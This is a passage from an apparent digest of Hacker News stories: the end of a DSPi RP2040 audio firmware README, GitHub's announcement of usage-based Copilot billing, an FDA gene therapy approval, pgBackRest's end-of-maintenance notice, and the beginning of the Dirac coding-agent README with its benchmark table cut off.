### 3. Build the Firmware

[](#3-build-the-firmware)

You can build for either the standard **RP2040** (Raspberry Pi Pico) or the newer **RP2350** (Raspberry Pi Pico 2). The build system uses separate directories to avoid conflicts.

**Option A: Build for RP2040 (Standard Pico)**

```
mkdir build-rp2040
cd build-rp2040
cmake -DPICO_BOARD=pico -DPICO_EXTRAS_PATH=../firmware/pico-extras ../firmware
make
```

*Output:* `DSPi/DSPi.uf2`

**Option B: Build for RP2350 (Pico 2)**

```
mkdir build-rp2350
cd build-rp2350
cmake -DPICO_BOARD=pico2 -DPICO_EXTRAS_PATH=../firmware/pico-extras ../firmware
make
```

*Output:* `DSPi/DSPi.uf2`

### 4. Flash the Device

[](#4-flash-the-device)

1. Hold the **BOOTSEL** button on your board while plugging it in.
2. Drag and drop the generated `.uf2` file onto the `RPI-RP2` (or `RP2350`) drive.

Alternatively, an already-running DSPi can be put into bootloader mode without a button press by sending `REQ_ENTER_BOOTLOADER` (0xF0). The DSPi Console application uses this for one-click firmware updates. See [`Documentation/Features/firmware_update.md`](https://github.com/WeebLabs/DSPi/blob/main/Documentation/Features/firmware_update.md) for the protocol details.

* * *

## Detailed Specifications

[](#detailed-specifications)

In-depth specs for each subsystem are kept under [`Documentation/Features/`](https://github.com/WeebLabs/DSPi/blob/main/Documentation/Features). These are the authoritative source for protocol formats, wire layouts, edge cases, and host-app integration patterns.

Feature Spec Matrix Mixer [`matrixmixer_spec.md`](https://github.com/WeebLabs/DSPi/blob/main/Documentation/Features/matrixmixer_spec.md) User Presets [`user_presets_spec.md`](https://github.com/WeebLabs/DSPi/blob/main/Documentation/Features/user_presets_spec.md) Master Volume [`master_volume_spec.md`](https://github.com/WeebLabs/DSPi/blob/main/Documentation/Features/master_volume_spec.md) Per-Channel Preamp [`per_channel_preamp_spec.md`](https://github.com/WeebLabs/DSPi/blob/main/Documentation/Features/per_channel_preamp_spec.md) Volume Leveller [`volume_leveller_spec.md`](https://github.com/WeebLabs/DSPi/blob/main/Documentation/Features/volume_leveller_spec.md) I2S Output [`i2s_output_spec.md`](https://github.com/WeebLabs/DSPi/blob/main/Documentation/Features/i2s_output_spec.md) Peak / Clip Metering [`peak_clip_metering_spec.md`](https://github.com/WeebLabs/DSPi/blob/main/Documentation/Features/peak_clip_metering_spec.md) Buffer Statistics [`buffer_statistics_spec.md`](https://github.com/WeebLabs/DSPi/blob/main/Documentation/Features/buffer_statistics_spec.md) S/PDIF DMA Starvation [`spdif_starvation_spec.md`](https://github.com/WeebLabs/DSPi/blob/main/Documentation/Features/spdif_starvation_spec.md) USB Error Diagnostics [`usb_errors_spec.md`](https://github.com/WeebLabs/DSPi/blob/main/Documentation/Features/usb_errors_spec.md) Core 1 Modes [`core1_modes_spec.md`](https://github.com/WeebLabs/DSPi/blob/main/Documentation/Features/core1_modes_spec.md) Device Identification [`device_identification_spec.md`](https://github.com/WeebLabs/DSPi/blob/main/Documentation/Features/device_identification_spec.md) S/PDIF Input (planned) [`SPDIF_input_spec.md`](https://github.com/WeebLabs/DSPi/blob/main/Documentation/Features/SPDIF_input_spec.md) Firmware Update via USB [`Documentation/Features/firmware_update.md`](https://github.com/WeebLabs/DSPi/blob/main/Documentation/Features/firmware_update.md) Roadmap [`roadmap.md`](https://github.com/WeebLabs/DSPi/blob/main/Documentation/Features/roadmap.md)

* * *

## License

[](#license)

This project is licensed under the GNU General Public License v3.0. See [LICENSE](https://github.com/WeebLabs/DSPi/blob/main/LICENSE) for details.

---

## [HN-TITLE] 24. GitHub Copilot is moving to usage-based billing

- **Source**: [https://github.blog/news-insights/company-news/github-copilot-is-moving-to-usage-based-billing/](https://github.blog/news-insights/company-news/github-copilot-is-moving-to-usage-based-billing/)
- **Site**: The GitHub Blog
- **Author**: Mario Rodriguez
- **Published**: 2026-04-27
- **HN activity**: 574 points · [428 comments](https://news.ycombinator.com/item?id=47923357)
- **Length**: 983 words (~5 min read)
- **Language**: en-US

***TL;DR:** Today, we are announcing that all GitHub Copilot plans will transition to usage-based billing on **June 1, 2026**.*

Instead of counting premium requests, every Copilot plan will include a monthly allotment of **GitHub AI Credits**, with the option for paid plans to purchase additional usage. Usage will be calculated based on token consumption, including input, output, and cached tokens, using the listed API rates for each model.

This change aligns Copilot pricing with actual usage and is an important step toward a sustainable, reliable Copilot business and experience for all users.

To help customers prepare, we are also launching a **preview bill** experience in early May, giving users and admins visibility into projected costs before the June 1 transition. This will be available to users via their Billing Overview page when they log in to github.com.

## Why we’re making this change

Copilot is not the same product it was a year ago.

It has evolved from an in-editor assistant into an agentic platform capable of running long, multi-step coding sessions, using the latest models, and iterating across entire repositories. Agentic usage is becoming the default, and it brings significantly higher compute and inference demands.

Today, a quick chat question and a multi-hour autonomous coding session can cost the user the same amount. GitHub has absorbed much of the escalating inference cost behind that usage, but the current premium request model is no longer sustainable.

Usage-based billing fixes that. It better aligns pricing with actual usage, helps us maintain long-term service reliability, and reduces the need to gate heavy users.

## What’s changing

Starting **June 1**, premium request units (PRUs) will be replaced by **GitHub AI Credits**.

Credits will be consumed based on token usage, including input, output, and cached tokens, according to the published API rates for each model.

A few important details:

- **Base plan pricing is not changing.** Copilot Pro remains $10/month, Pro+ remains $39/month, Business remains $19/user/month, and Enterprise remains $39/user/month.
- **Code completions and Next Edit suggestions remain included** in all plans and do not consume AI Credits.
- **Fallback experiences will no longer be available.** Today, users who exhaust PRUs may fall back to a lower-cost model and continue working. Under the new model, usage will instead be governed by available credits and admin budget controls.
- **Copilot code review will also consume GitHub Actions minutes**, in addition to GitHub AI Credits. These minutes are billed at the same per-minute rates as other GitHub Actions workflows.

Last week, [we also rolled out temporary changes](https://github.blog/news-insights/company-news/changes-to-github-copilot-individual-plans/) to Copilot Individual plans, including Free, Pro, Pro+, and Student, and paused self-serve Copilot Business plan purchases. These were reliability and performance measures as we prepare for the broader transition to usage-based billing. We will loosen usage limits once usage-based billing is in effect.

## What this means for individuals

Copilot Pro and Pro+ monthly subscriptions will include monthly AI Credits aligned to their current subscription prices:

- **Copilot Pro:** $10/month, including $10 in monthly AI Credits
- **Copilot Pro+:** $39/month, including $39 in monthly AI Credits

Users on a monthly Pro or Pro+ plan will automatically migrate to usage-based billing on June 1, 2026.

Users on annual Pro or Pro+ plans will remain on their existing plan with premium request-based pricing until their plan expires. [Model multipliers will increase on June 1 (see table)](https://docs.github.com/copilot/reference/copilot-billing/models-and-pricing#model-multipliers-for-annual-copilot-pro-and-copilot-pro-subscribers) for annual plan subscribers *only*. At expiration, they will transition to Copilot Free with the option to upgrade to a paid monthly plan. Alternatively, they may convert to a monthly paid plan before their annual plan expires, and we will provide prorated credits for the remaining value of their annual plan.

## What this means for businesses and enterprises

Copilot Business and Copilot Enterprise monthly seat pricing remains unchanged:

- **Copilot Business:** $19/user/month, including $19 in monthly AI Credits
- **Copilot Enterprise:** $39/user/month, including $39 in monthly AI Credits

To support the transition, existing Copilot Business and Copilot Enterprise customers will automatically receive promotional included usage for June, July, and August:

- **Copilot Business**: $30 in monthly AI Credits
- **Copilot Enterprise**: $70 in monthly AI Credits

We are also introducing pooled included usage across a business, which helps eliminate stranded capacity. Instead of each user’s unused included usage being isolated, credits can be pooled across the organization.

Admins will also have new budget controls. They will be able to set budgets at the enterprise, cost center, and user levels. When the included pool is exhausted, organizations can choose whether to allow additional usage at published rates or cap spend.

## The bottom line

Plan prices aren’t changing. You’ll have full control over what you spend, tools to track your usage, and the option to purchase more AI Credits if and when you need them.

If you have questions, visit our documentation for [individuals](https://docs.github.com/copilot/concepts/billing/usage-based-billing-for-individuals) and for [businesses and enterprises](https://docs.github.com/copilot/concepts/billing/usage-based-billing-for-organizations-and-enterprises), and our [FAQ and related discussion](https://github.com/orgs/community/discussions/192948).

## Written by

![Mario Rodriguez](https://avatars.githubusercontent.com/u/884366?v=4&s=200)

Mario Rodriguez leads the GitHub Product team as Chief Product Officer. His core identity is being a learner and his passion is creating developer tools—so much so that he has spent the last 20 years living that mission in leadership roles across Microsoft and GitHub. Mario most recently oversaw GitHub’s AI strategy and the GitHub Copilot product line, launching and growing Copilot across thousands of organizations and millions of users. Mario spends time outside of GitHub with his wife and two daughters. He also co-chairs and founded a charter school in an effort to progress education in rural regions of the United States.

## Related posts

![Image featuring the GitHub logo above geometric block shapes suggesting a tech-themed background.](https://github.blog/wp-content/uploads/2026/01/generic-github-logo-right.png?resize=400%2C212)

![Image featuring the GitHub invertocat logo displayed on a floating cube against a decorative background.](https://github.blog/wp-content/uploads/2026/01/generic-invertocat-github-logo.png?resize=400%2C212)

![Geometric background featuring cubes with the GitHub invertocat logo and related icons.](https://github.blog/wp-content/uploads/2026/01/generic-github-invertocat-logo.png?resize=400%2C212)

## Explore more from GitHub

![Docs](https://github.blog/wp-content/uploads/2024/07/Icon-Circle.svg)

### Docs

Everything you need to master GitHub, all in one place.

[Go to Docs](https://docs.github.com/)

![GitHub](https://github.blog/wp-content/uploads/2024/07/recirculation-github-icon.svg)

### GitHub

Build what’s next on GitHub, the place for anyone from anywhere to build anything.

[Start building](https://github.com/)

![Customer stories](https://github.blog/wp-content/uploads/2024/07/Icon_da43dc.svg)

### Customer stories

Meet the companies and engineering teams that build with GitHub.

[Learn more](https://github.com/customer-stories)

![The GitHub Podcast](https://github.blog/wp-content/uploads/2023/02/galaxy23-icon.svg)

### The GitHub Podcast

Catch up on the GitHub podcast, a show dedicated to the topics, trends, stories and culture in and around the open source developer community on GitHub.

[Listen now](https://the-github-podcast.simplecast.com/)

---

## [HN-TITLE] 25. FDA approves first gene therapy for treatment of genetic hearing loss

- **Source**: [https://www.fda.gov/news-events/press-announcements/fda-approves-first-ever-gene-therapy-treatment-genetic-hearing-loss-under-national-priority-voucher](https://www.fda.gov/news-events/press-announcements/fda-approves-first-ever-gene-therapy-treatment-genetic-hearing-loss-under-national-priority-voucher)
- **Site**: FDA
- **Author**: Office of the Commissioner
- **Submitted**: 2026-04-27 10:15 UTC (Hacker News)
- **HN activity**: 221 points · [82 comments](https://news.ycombinator.com/item?id=47919733)
- **Length**: 680 words (~3 min read)
- **Language**: en

FDA News Release

Groundbreaking AAV-based gene therapy offers potential treatment for patients with OTOF gene-associated severe-to-profound and profound hearing loss

For Immediate Release:

April 23, 2026

The U.S. Food and Drug Administration today approved Otarmeni (lunsotogene parvec-cwha), the first-ever dual adeno-associated virus (AAV) vector-based gene therapy. Otarmeni is indicated for the treatment of pediatric and adult patients with severe-to-profound and profound sensorineural hearing loss (any frequency &gt;90 dB HL) associated with molecularly confirmed biallelic variants in the *OTOF* gene.

Following the publication of powerful results of hearing restoration in the New England Journal of Medicine, the FDA acted swiftly to grant a national priority voucher for an accelerated review. Today’s approval was issued 61 days after BLA filing, marking the sixth approval under [the Commissioner's National Priority Voucher (CNPV) pilot program](https://www.fda.gov/industry/commissioners-national-priority-voucher-cnpv-pilot-program "Commissioner's National Priority Voucher (CNPV) Pilot Program") and the first gene therapy product approved under the program. It is also tied for the fastest BLA approval in modern FDA history.

Prior to today’s approval, no disease modifying treatments existed for *OTOF*-related deafness. Otarmeni is for patients with preserved outer hair cell function and no prior cochlear implant in the same ear.

“Today’s approval is a significant milestone in the treatment of genetic hearing loss,” **said FDA Commissioner Marty Makary, M.D., M.P.H.** “Through the national priority voucher pilot program, the agency is accelerating therapies for rare diseases with unmet medical needs while proving we can successfully review even the most complex submissions—such as novel dual vector gene therapies and combination products requiring coordination across multiple offices and centers—in significantly shortened timeframes.”

Genetic mutations cause about half of congenital hearing loss. Variants in the *OTOF* gene account for 2% to 8% of inherited, non-syndromic cases. Patients with two nonworking copies do not produce otoferlin, disrupting sound signal transmission. Delayed diagnosis can lead to missed treatment windows and lasting speech and language delays.

Otarmeni and the administration kit are a one time biologic-device combination product. It includes a dual adeno-associated virus serotype 1 (AAV1) vector gene therapy administered as a single dose per ear surgically into the cochlea via a syringe and catheter provided in the Administration Kit and connected to an infusion pump. Otarmeni delivers a functional copy of the *OTOF* gene to inner hair cells to restore otoferlin production and auditory signaling.

The safety and effectiveness of Otarmeni were based on results from a single, ongoing, multi-center, single-arm (compared to the natural history of untreated HL) clinical trial in 24 pediatric patients aged 10 months to 16 years with *OTOF* gene-associated severe-to-profound and profound sensorineural hearing loss (any frequency &gt;90 dB HL) with confirmatory evidence including mechanistic nonclinical data and sustained otoferlin protein expression post-Otarmeni administration. Of the 20 patients who were evaluable for efficacy, 80% experienced improved hearing, which is not expected in the natural history of the disease without intervention.

Common side effects included middle ear infection, nausea, dizziness, and procedural pain. Providers should monitor for surgical complications. The therapy is not recommended for patients with anatomy that prevents safe access to the inner ear.

The application was granted orphan drug, rare pediatric disease, fast track, and regenerative medicine advanced therapy (RMAT) designations. The FDA granted accelerated approval of Otarmeni to Regeneron Pharmaceuticals, Inc. Continued approval may be contingent upon assessment of durability of hearing improvement along with verification of treatment effects on clinical measures of speech development and quality of life. 

On June 4, 2026, the FDA will host a [public meeting](https://www.fda.gov/news-events/fda-meetings-conferences-and-workshops/commissioners-national-priority-voucher-cnpv-pilot-program-public-hearing-06042026 "Commissioner’s National Priority Voucher (CNPV) Pilot Program Public Hearing - 06/04/2026") to solicit feedback about the CNPV pilot program’s eligibility criteria, the voucher selection process, sponsor's responsibilities, pre-submission requirements, FDA review procedures, the role of the CNPV review council, and program implementation. Interested parties may also submit written comments through June 29, 2026. 

* * *

**Consumer:**  
888-INFO-FDA

\###

Boilerplate

The FDA, an agency within the U.S. Department of Health and Human Services, protects the public health by assuring the safety, effectiveness, and security of human and veterinary drugs, vaccines and other biological products for human use, and medical devices. The agency also is responsible for the safety and security of our nation’s food supply, cosmetics, dietary supplements, radiation-emitting electronic products, and for regulating tobacco products.

* * *

---

## [HN-TITLE] 26. Pgbackrest is no longer being maintained

- **Source**: [https://github.com/pgbackrest/pgbackrest](https://github.com/pgbackrest/pgbackrest)
- **Site**: GitHub
- **Submitter**: c0l0 (Hacker News)
- **Submitted**: 2026-04-27 10:56 UTC (Hacker News)
- **HN activity**: 397 points · [213 comments](https://news.ycombinator.com/item?id=47919997)
- **Length**: 1.4K words (~7 min read)
- **Language**: en

## NOTICE OF OBSOLESCENCE

[](#notice-of-obsolescence)

TL;DR: pgBackRest is no longer being maintained. If you fork pgBackRest, please select a new name for your project.

After a lot of thought, I have decided to stop working on pgBackRest. I did not come to this decision lightly. pgBackRest has been my passion project for the last thirteen years, and I was fortunate to have corporate sponsorship for much of this time, but there were also many late nights and weekends as I worked to make pgBackRest the project it is today, aided by numerous contributors. Every open-source developer knows exactly what I mean and how much of your life gets devoted to a special project.

Since Crunchy Data was sold, I have been maintaining pgBackRest and looking for a position that would allow me to continue the work, but so far I have not been successful. Likewise, my efforts to secure sponsorship have also fallen far short of what I need to make the project viable.

Like everyone else, I need to make a living, and the range of pgBackRest-related roles is very limited. I can now consider a wider variety of opportunities, but those will not leave me time to work on pgBackRest, which requires a fair amount of time for maintenance, bug fixes, PR reviews, answering issues, etc. That does not even include time to write new features, which is what I really love to do. Rather than do the work poorly and/or sporadically, I think it makes more sense to have a hard stop.

I imagine at some point pgBackRest will be forked, but that will be a new project with new maintainers, and they will need to build trust the same way we did.

Again, many thanks to all the pgBackRest contributors over the years. It was a pleasure working with you!

## Introduction

[](#introduction)

pgBackRest is a reliable backup and restore solution for PostgreSQL that seamlessly scales up to the largest databases and workloads.

pgBackRest [v2.58.0](https://github.com/pgbackrest/pgbackrest/releases/tag/release/2.58.0) is the current stable release. Release notes are on the [Releases](http://www.pgbackrest.org/release.html) page.

## Features

[](#features)

### Parallel Backup & Restore

[](#parallel-backup--restore)

Compression is usually the bottleneck during backup operations so pgBackRest solves this problem with parallel processing and more efficient compression algorithms such as lz4 and zstd.

### Local or Remote Operation

[](#local-or-remote-operation)

A custom protocol allows pgBackRest to backup, restore, and archive locally or remotely via TLS/SSH with minimal configuration. An interface to query PostgreSQL is also provided via the protocol layer so that remote access to PostgreSQL is never required, which enhances security.

### Multiple Repositories

[](#multiple-repositories)

Multiple repositories allow, for example, a local repository with minimal retention for fast restores and a remote repository with a longer retention for redundancy and access across the enterprise.

### Full, Differential, & Incremental Backups (at File or Block Level)

[](#full-differential--incremental-backups-at-file-or-block-level)

Full, differential, and incremental backups are supported. pgBackRest is not susceptible to the time resolution issues of rsync, making differential and incremental backups safe without the requirement to checksum each file. Block-level backups save space by only copying the parts of files that have changed.

### Backup Rotation & Archive Expiration

[](#backup-rotation--archive-expiration)

Retention polices can be set for full and differential backups to create coverage for any time frame. The WAL archive can be maintained for all backups or strictly for the most recent backups. In the latter case WAL required to make older backups consistent will be maintained in the archive.

### Backup Integrity

[](#backup-integrity)

Checksums are calculated for every file in the backup and rechecked during a restore or verify. After a backup finishes copying files, it waits until every WAL segment required to make the backup consistent reaches the repository.

Backups in the repository may be stored in the same format as a standard PostgreSQL cluster (including tablespaces). If compression is disabled and hard links are enabled it is possible to snapshot a backup in the repository and bring up a PostgreSQL cluster directly on the snapshot. This is advantageous for terabyte-scale databases that are time consuming to restore in the traditional way.

All operations utilize file and directory level fsync to ensure durability.

### Page Checksums

[](#page-checksums)

If page checksums are enabled pgBackRest will validate the checksums for every file that is copied during a backup. All page checksums are validated during a full backup and checksums in files that have changed are validated during differential and incremental backups.

Validation failures do not stop the backup process, but warnings with details of exactly which pages have failed validation are output to the console and file log.

This feature allows page-level corruption to be detected early, before backups that contain valid copies of the data have expired.

### Backup Resume

[](#backup-resume)

An interrupted backup can be resumed from the point where it was stopped. Files that were already copied are compared with the checksums in the manifest to ensure integrity. Since this operation can take place entirely on the repository host, it reduces load on the PostgreSQL host and saves time since checksum calculation is faster than compressing and retransmitting data.

### Streaming Compression & Checksums

[](#streaming-compression--checksums)

Compression and checksum calculations are performed in stream while files are being copied to the repository, whether the repository is located locally or remotely.

If the repository is on a repository host, compression is performed on the PostgreSQL host and files are transmitted in a compressed format and simply stored on the repository host. When compression is disabled a lower level of compression is utilized to make efficient use of available bandwidth while keeping CPU cost to a minimum.

### Delta Restore

[](#delta-restore)

The manifest contains checksums for every file in the backup so that during a restore it is possible to use these checksums to speed processing enormously. On a delta restore any files not present in the backup are first removed and then checksums are generated for the remaining files. Files that match the backup are left in place and the rest of the files are restored as usual. Parallel processing can lead to a dramatic reduction in restore times.

### Parallel, Asynchronous WAL Push & Get

[](#parallel-asynchronous-wal-push--get)

Dedicated commands are included for pushing WAL to the archive and getting WAL from the archive. Both commands support parallelism to accelerate processing and run asynchronously to provide the fastest possible response time to PostgreSQL.

WAL push automatically detects WAL segments that are pushed multiple times and de-duplicates when the segment is identical, otherwise an error is raised. Asynchronous WAL push allows transfer to be offloaded to another process which compresses WAL segments in parallel for maximum throughput. This can be a critical feature for databases with extremely high write volume.

Asynchronous WAL get maintains a local queue of WAL segments that are decompressed and ready for replay. This reduces the time needed to provide WAL to PostgreSQL which maximizes replay speed. Higher-latency connections and storage (such as S3) benefit the most.

The push and get commands both ensure that the database and repository match by comparing PostgreSQL versions and system identifiers. This virtually eliminates the possibility of misconfiguring the WAL archive location.

### Tablespace & Link Support

[](#tablespace--link-support)

Tablespaces are fully supported and on restore tablespaces can be remapped to any location. It is also possible to remap all tablespaces to one location with a single command which is useful for development restores.

File and directory links are supported for any file or directory in the PostgreSQL cluster. When restoring it is possible to restore all links to their original locations, remap some or all links, or restore some or all links as normal files or directories within the cluster directory.

### S3, Azure, and GCS Compatible Object Store Support

[](#s3-azure-and-gcs-compatible-object-store-support)

pgBackRest repositories can be located in S3, Azure, and GCS compatible object stores to allow for virtually unlimited capacity and retention.

### Encryption

[](#encryption)

pgBackRest can encrypt the repository to secure backups wherever they are stored.

### Compatibility with ten versions of PostgreSQL

[](#compatibility-with-ten-versions-of-postgresql)

pgBackRest includes support for ten versions of PostgreSQL, the five supported versions and the last five EOL versions. This allows ample time to upgrade to a supported version.

## Getting Started

[](#getting-started)

pgBackRest strives to be easy to configure and operate:

- [User guides](http://www.pgbackrest.org/user-guide-index.html) for various operating systems and PostgreSQL versions.
- [Command reference](http://www.pgbackrest.org/command.html) for command-line operations.
- [Configuration reference](http://www.pgbackrest.org/configuration.html) for creating pgBackRest configurations.

## Sponsorship

[](#sponsorship)

pgBackRest would not exist without sponsors. Writing new features, fixing bugs, reviewing contributions, answering questions from the community, and maintenance all take a considerable amount of time.

Current sponsors: [Supabase](https://supabase.com).

Past sponsors: [Crunchy Data](https://crunchydata.com), [Resonate](https://resonate.com).

## Recognition

[](#recognition)

[Armchair](https://thenounproject.com/icon/armchair-129971) graphic by [Alexander Skowalsky](https://thenounproject.com/sandorsz).

---

## [HN-TITLE] 27. Show HN: OSS Agent I built topped the TerminalBench on Gemini-3-flash-preview

- **Source**: [https://github.com/dirac-run/dirac](https://github.com/dirac-run/dirac)
- **Site**: GitHub
- **Submitter**: GodelNumbering (Hacker News)
- **Submitted**: 2026-04-27 12:35 UTC (Hacker News)
- **HN activity**: 309 points · [118 comments](https://news.ycombinator.com/item?id=47920787)
- **Length**: 939 words (~5 min read)
- **Language**: en

## Dirac - Accurate & Highly Token Efficient Open Source AI Agent

[](#dirac---accurate--highly-token-efficient-open-source-ai-agent)

> **Dirac topped the [Terminal-Bench-2 leaderboard](https://huggingface.co/datasets/harborframework/terminal-bench-2-leaderboard/discussions/145) for `gemini-3-flash-preview` with a 65.2% score!**

It is a well studied phenomenon that any given model's reasoning ability degrades with the context length. If we can keep context tightly curated, we improve both accuracy and cost while making larger changes tractable in a single task.

Dirac is an open-source coding agent built with this in mind. It reduces API costs by **64.8%** on average while producing better and faster work. Using hash-anchored parallel edits, AST manipulation, and a suite of advanced optimizations. Oh, and no MCP.

Our goal: Optimize for bang-for-the-buck on tooling with bare minimum prompting instead of going blindly minimalistic.

## 📊 Evals

[](#-evals)

Dirac is benchmarked against other leading open-source agents on complex, real-world refactoring tasks. Dirac consistently achieves 100% accuracy at a fraction of the cost. These evals are run on public github repos and should be reproducible by anyone.

> 🏆 **TerminalBench 2.0 Leaderboard**: Dirac recently topped the [Terminal-Bench-2 leaderboard](https://huggingface.co/datasets/harborframework/terminal-bench-2-leaderboard/discussions/145) with a **65.2%** score using `gemini-3-flash-preview`. This outperforms both Google's official baseline (**47.6%**) and the top closed-source agent Junie CLI (**64.3%**). This was achieved without any benchmark-specific info or any `AGENTS.md` files being inserted.

> **Note on the cost table below**: A bug was discovered in Cline, the parent repo, after running these evals ([issue #10314](https://github.com/cline/cline/issues/10314)). We have submitted a [PR #10315](https://github.com/cline/cline/pull/10315) to fix this. This bug caused the evals for Dirac and Cline to slightly underreport the numbers ($0.03 vs $0.05 per million token cache read). Although there won't be a large difference, we will update the evals soon.

All tasks for all models used `gemini-3-flash-preview` with thinking set to `high`

Task (Repo) Files* Cline Kilo Ohmypi Opencode Pimono Roo **Dirac** Task1 ([transformers](https://github.com/huggingface/transformers)) 8 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/cline/cline_refactor_DynamicCache) \[$0.37] 🔴 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/kilo/kilo_code_refactor_DynamicCache_FAILURE) \[N/A] 🟡 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/ohmypi/ohmypi_refactor_DynamicCache) \[$0.24] 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/opencode/opencode_refactor_DynamicCache) \[$0.20] 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/pimono/pimono_refactor_DynamicCache) \[$0.34] 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/roo/roo_code_refactor_DynamicCache) \[$0.49] **🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/dirac/dirac_refactor_DynamicCache) \[$0.13]** Task2 ([vscode](https://github.com/microsoft/vscode)) 21 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/cline/cline_refactor_IOverlayWidget) \[$0.67] 🟡 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/kilo/kilo_code_refactor_IOverlayWidget) \[$0.78] 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/ohmypi/ohmypi_refactor_IOverlayWidget) \[$0.63] 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/opencode/opencode_refactor_IOverlayWidget) \[$0.40] 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/pimono/pimono_refactor_IOverlayWidget) \[$0.48] 🟡 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/roo/roo_code_refactor_IOverlayWidget) \[$0.58] **🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/dirac/dirac_refactor_IOverlayWidget) \[$0.23]** Task3 ([vscode](https://github.com/microsoft/vscode)) 12 🟡 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/cline/cline_refactor_addLogging) \[$0.42] 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/kilo/kilo_code_refactor_addLogging) \[$0.70] 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/ohmypi/ohmypi_refactor_addLogging) \[$0.64] 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/opencode/opencode_refactor_addLogging) \[$0.32] 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/pimono/pimono_refactor_addLogging) \[$0.25] 🟡 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/roo/roo_code_refactor_addLogging) \[$0.45] **🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/dirac/dirac_refactor_addLogging) \[$0.16]** Task4 ([django](https://github.com/django/django)) 14 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/cline/cline_refactor_datadict) \[$0.36] 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/kilo/kilo_code_refactor_datadict) \[$0.42] 🟡 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/ohmypi/ohmypi_refactor_datadict) \[$0.32] 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/opencode/opencode_refactor_datadict) \[$0.24] 🟡 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/pimono/pimono_refactor_datadict) \[$0.24] 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/roo/roo_code_refactor_datadict) \[$0.17] **🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/dirac/dirac_refactor_datadict) \[$0.08]** Task5 ([vscode](https://github.com/microsoft/vscode)) 3 🔴 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/cline/cline_refactor_extensionswb_service_FAILURE) \[N/A] 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/kilo/kilo_code_refactor_extensionswb_service) \[$0.71] 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/ohmypi/ohmypi_refactor_extensionswb_service) \[$0.43] 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/opencode/opencode_refactor_extensionswb_service) \[$0.53] 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/pimono/pimono_refactor_extensionswb_service) \[$0.50] 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/roo/roo_code_refactor_extensionswb_service) \[$0.36] **🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/dirac/dirac_refactor_extensionswb_service) \[$0.17]** Task6 ([transformers](https://github.com/huggingface/transformers)) 25 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/cline/cline_refactor_latency) \[$0.87] 🟡 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/kilo/kilo_code_refactor_latency_WRONG) \[$1.51] 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/ohmypi/ohmypi_refactor_latency) \[$0.94] 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/opencode/opencode_refactor_latency) \[$0.90] 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/pimono/pimono_refactor_latency) \[$0.52] 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/roo/roo_code_refactor_latency) \[$1.44] **🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/dirac/dirac_refactor_latency) \[$0.34]** Task7 ([vscode](https://github.com/microsoft/vscode)) 13 🟡 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/cline/cline_refactor_sendRequest_2missing) \[$0.51] 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/kilo/kilo_code_refactor_sendRequest) \[$0.77] 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/ohmypi/ohmypi_refactor_sendRequest) \[$0.74] 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/opencode/opencode_refactor_sendRequest) \[$0.67] 🟡 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/pimono/pimono_refactor_sendRequest) \[$0.45] 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/roo/roo_code_refactor_sendRequest) \[$1.05] **🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/dirac/dirac_refactor_sendRequest) \[$0.25]** Task8 ([transformers](https://github.com/huggingface/transformers)) 3 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/cline/cline_refactor_stoppingcriteria) \[$0.25] 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/kilo/kilo_code_refactor_stoppingcriteria) \[$0.19] 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/ohmypi/ohmypi_code_refactor_stoppingcriteria) \[$0.17] 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/opencode/opencode_refactor_stoppingcriteria) \[$0.26] 🟢 [(diff)](https://github.com/dirac-run/dirac/blob/master/evals/pimono/pimono_code_refactor_stoppingcriteria) \[$0.23] 🟢 